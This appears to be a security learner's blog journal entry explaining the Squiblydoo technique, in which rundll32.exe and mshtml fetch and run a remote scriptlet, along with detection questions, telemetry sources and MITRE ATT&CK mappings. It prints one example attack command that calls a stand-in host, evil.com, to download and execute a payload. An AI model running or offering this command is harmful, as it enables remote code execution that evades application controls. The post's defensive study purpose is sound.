π Day 57 β LOLBins Deep Dive: Squiblydoo (rundll32 and mshtml Abuse)
π― Goal
Today I explored one of the most famous LOLBins (Living Off The Land Binaries) techniques used in Windows attacks: Squiblydoo.
The goal was to understand:
- how attackers abuse legitimate Windows binaries
- why this technique became widely used
- how defenders detect it in logs and telemetry.
π What I Did
I studied how attackers can abuse the Windows utility rundll32.exe together with the mshtml Internet Explorer engine to execute remote scripts.
An example command often referenced in security research looks like:
rundll32.exe javascript:β..\mshtml,RunHTMLApplicationβ;document.write();GetObject(βscript:https://evil.com/payload.sctβ)
Even though the syntax looks strange, the attack chain works as follows:
rundll32.exe
β
loads the mshtml engine
β
downloads a remote script
β
executes attacker-controlled code
Because the execution is performed through legitimate Windows components, this technique can bypass certain application restrictions.
π Key Cybersecurity Connections
This technique became well known because it has been used by:
- Metasploit
- PowerShell Empire
- multiple advanced threat groups
Security researchers refer to this technique as Squiblydoo.
The key idea is that attackers do not need to drop a malicious executable.
Instead they can abuse existing Windows components to execute their payload.
π Investigation Questions
If this behavior appeared in endpoint telemetry, a SOC analyst might ask:
- What process launched rundll32.exe?
- What command-line arguments were used?
- Was the
javascript:protocol invoked throughmshtml? - Did the system make outbound network connections immediately after execution?
- Are other endpoints executing similar
rundll32commands? - Did the execution spawn additional suspicious child processes?
These questions help analysts determine whether the activity represents legitimate behavior or a LOLBin abuse technique.
π¨ Detection Opportunities
Possible detection strategies include:
- alerting on suspicious rundll32.exe command-line arguments
- detecting command lines containing
javascript:orRunHTMLApplication - monitoring for
GetObject("script:...")execution patterns - identifying unusual parent β child process relationships
- correlating process execution with outbound network activity
Telemetry sources useful for this type of detection include:
- Sysmon process creation events
- EDR process monitoring
- command-line auditing logs.
π§ MITRE ATT&CK Techniques
This technique aligns with several MITRE ATT&CK entries:
- T1218 β Signed Binary Proxy Execution
- T1059 β Command and Scripting Interpreter
- T1105 β Ingress Tool Transfer
Mapping activity to ATT&CK techniques helps defenders categorize attacker behavior and build detection rules.
β Why This Technique Is Dangerous
Traditional defenses often focus on detecting malware files.
But Squiblydoo demonstrates a different approach:
Legitimate binary
β
loads legitimate Windows component
β
downloads malicious script
β
payload executes
No obvious malware file is required.
π What I Learned
When defenders investigate suspicious command execution, they often look for unusual command-line arguments.
Possible red flags include command lines containing:
javascript:mshtmlRunHTMLApplicationGetObject("script:...")
Security analysts often detect these behaviors using:
- EDR telemetry
- command-line logging
- Sysmon process creation logs.
β‘ Next Steps
Next topics to explore include:
- how Windows loads DLL files
- how malware hides inside DLLs
- how defenders verify file authenticity.
π§ Reflection
Studying this technique made it clear that attackers often prefer stealth and reliability over complex exploits.
Abusing trusted system components can be more effective than deploying obvious malware.
π§© Lessons Learned
What worked
Breaking down the command step by step made the attack chain easier to understand.
What broke
The command syntax initially looked confusing and almost unreadable.
Why it broke
Many LOLBin techniques rely on obscure Windows functionality.
Fix / takeaway
Focus on understanding execution flow, not only syntax.
π Skill Progression Context
Understanding LOLBins strengthens defensive analysis skills.
It helps when learning:
- process execution analysis
- command-line telemetry investigation
- detection engineering for suspicious process chains.
